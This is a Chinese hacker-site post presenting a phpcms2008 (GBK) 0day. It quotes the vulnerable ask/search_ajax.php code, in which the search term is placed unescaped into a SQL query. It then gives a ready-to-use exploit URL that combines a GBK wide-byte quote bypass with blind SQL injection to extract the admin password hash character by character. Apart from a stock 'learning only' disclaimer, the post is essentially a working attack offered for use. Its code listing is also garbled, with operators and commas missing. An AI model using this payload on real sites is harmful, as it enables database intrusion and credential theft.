phpcms2008-0day 漏洞利用 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

phpcms2008-0day 漏洞利用

admin 漏洞预警

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

以下是代码片段:

PHP代码
01.<?php
02.require './include/common.inc.php';
03.require_once MOD_ROOT.'include/ask.class.php';
04.$ask new ask();
05.header('Content-type: text/html; charset=utf-8');
06.if(strtolower(CHARSET) != 'utf-8'$q = iconv(CHARSET, 'utf-8'$q);
07.if($q)
08.$where " title LIKE '%$q%' AND status = 5"; }
09.else{exit('null');} 
10.$infos $ask->listinfo($where'askid DESC''', 10);
11.foreach($infos as $key=>$val)
12.{$val['title'] = str_replace($q'<span class="c_orange">'.$q.'</span>'$val['title']);
13.$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8'$val['title']) :$val['title']; 
14.$info[$key]['url'] = $val['url'];}  
15.echo(json_encode($info)); 
16.?>

利用方法:

ask/search_ajax.php?q=s%E6’/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

0x706870636D73是phpcms的十六进制代码。

标签: phpcms

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表